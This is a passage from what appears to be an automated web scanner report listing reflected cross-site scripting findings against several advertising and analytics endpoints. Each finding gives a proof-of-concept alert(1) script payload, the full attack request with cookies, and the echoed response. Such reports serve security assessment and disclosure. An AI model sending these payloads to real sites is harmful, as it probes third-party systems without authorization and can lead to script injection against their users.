bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; vuday1=%)0sI!!w[/N0FYbn[@`@; pv1="b!!!!(!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~"; BX=ei08qcd75vc4d&b=3&s=8s&t=246; lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00AM5JknRO1[uD%T4O

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:36 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:16:36 GMT
Pragma: no-cache
Content-Length: 4886
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?66ccc"-alert(1)-"1cf28eb4781=1&Z=728x90&cb=1315404889357362&S=14494094&i=334050&ycg=&ypos=N&yprop=au%5fnews&yrc=&yyob=&_salt=1254241580";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex
...[SNIP]...

2.11. http://adnxs.revsci.net/imp [Z parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f2cb'-alert(1)-'936fd5c05b5 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x906f2cb'-alert(1)-'936fd5c05b5&s=814544&r=0&_salt=1883775268&u=http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933%26keyword%3Dwa%2Fnews_home HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 08-Sep-2011 14:15:40 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:15:40 GMT
Content-Length: 766

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x906f2cb'-alert(1)-'936fd5c05b5&referrer=http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html%3Fcb=0.5778487676288933%26keyword=wa/news_home&inv_code=814544&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%2
...[SNIP]...

2.12. http://adnxs.revsci.net/imp [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4bc4'-alert(1)-'9458e980064 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=814544d4bc4'-alert(1)-'9458e980064&r=0&_salt=1883775268&u=http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933%26keyword%3Dwa%2Fnews_home HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 08-Sep-2011 14:15:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:15:57 GMT
Content-Length: 766

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html%3Fcb=0.5778487676288933%26keyword=wa/news_home&inv_code=814544d4bc4'-alert(1)-'9458e980064&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D814544d4bc4%27-alert%281%29-%279458e980064%26r%3D0%26_salt%3D1883775268%26u%3Dhttp%253A%2
...[SNIP]...

2.13. http://ads.adbrite.com/adserver/vdi/830697 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/830697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1f582<script>alert(1)</script>f76e5daf269 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/8306971f582<script>alert(1)</script>f76e5daf269?r=http%3A%2F%2Fi.w55c.net%2Fm.gif%3Fid%3D8bb138bc0446417c9a4df9a0136d0caf8a93328592bf4d059bfc856c256fbc33%26ei%3DADBRITE%26cver%3D1%26euid%3D&d=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb=0:742697:20828160:2925993182975414771:0; rb2=CiMKBjc0MjY5Nxie3fO1NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; untarget=1

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Wed, 07 Sep 2011 14:17:35 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/8306971f582<script>alert(1)</script>f76e5daf269

2.14. http://ads.adbrite.com/adserver/vdi/830697 [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/830697

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload b909d<script>alert(1)</script>f313b2d04d0 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/830697?r=b909d<script>alert(1)</script>f313b2d04d0&d=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb=0:742697:20828160:2925993182975414771:0; rb2=CiMKBjc0MjY5Nxie3fO1NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; untarget=1

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Wed, 07 Sep 2011 14:16:42 GMT
Server: XPEHb/1.0
Content-Length: 123

Unsupported URL: /adserver/vdi/b909d<script>alert(1)</script>f313b2d04d0MTY4Mjk2NTMyeDAuNTExIDEzMTU0MDQ5NzR4LTE5MTU4MDA4OTk

2.15. http://adsfac.us/ag.asp [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 39812<script>alert(1)</script>540457d8300 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=39812<script>alert(1)</script>540457d8300&source=js&ord=1570906 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Wed, 07 Sep 2011 14:22:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS39812%3Cscript%3Ealert%281%29%3C%2Fscript%3E540457d83000=uid=15673736; expires=Thu, 08-Sep-2011 14:23:10 GMT; domain=.adsfac.us; path=/
Set-Cookie: FS39812%3Cscript%3Ealert%281%29%3C%2Fscript%3E540457d8300=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4267&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Fri, 07-Oct-2011 14:23:10 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=983108392662652773039f479290ed7f5e6371f; expires=Fri, 07-Oct-2011 14:23:10 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Wed, 07 Sep 2011 14:23:10 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://adsfac.us/link.asp?cc=39812<script>alert(1)</script>540457d8300.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

2.16. http://api-public.addthis.com/url/shares.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4230a<script>alert(1)</script>8e1156657a0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.abc.net.au%2Fnews%2F2011-09-07%2Fchristmas-island-inquest-reopens%2F2875554%2F%3Fsite%3Dperth%26section%3Dnews&callback=_ate.cbs.sc_httpwwwabcnetaunews20110907christmasislandinquestreopens2875554siteperth26sectionnews104230a<script>alert(1)</script>8e1156657a0 HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/?site=perth&section=news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,99|36

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=600
Content-Type: application/javascript;charset=UTF-8
Date: Wed, 07 Sep 2011 14:21:17 GMT
Content-Length: 155
Connection: close

_ate.cbs.sc_httpwwwabcnetaunews20110907christmasislandinquestreopens2875554siteperth26sectionnews104230a<script>alert(1)</script>8e1156657a0({"shares":0});

2.17. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9f02c<script>alert(1)</script>2f397727029 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=89f02c<script>alert(1)</script>2f397727029&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:19 GMT
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"89f02c<script>alert(1)</script>2f397727029", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.18. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload f6e67<script>alert(1)</script>afb97656188 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=f6e67<script>alert(1)</script>afb97656188&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"f6e67<script>alert(1)</script>afb97656188", c15:"", c16:"", r:""});



2.19. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 71f41<script>alert(1)</script>bff8cc07395 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=71f41<script>alert(1)</script>bff8cc07395 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"71f41<script>alert(1)</script>bff8cc07395", c16:"", r:""});



2.20. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload c84f7<script>alert(1)</script>7046597ac2c was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322c84f7<script>alert(1)</script>7046597ac2c&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:19 GMT
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322c84f7<script>alert(1)</script>7046597ac2c", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.21. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload a046a<script>alert(1)</script>d230dd3e0c7 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=a046a<script>alert(1)</script>d230dd3e0c7&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:19 GMT
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
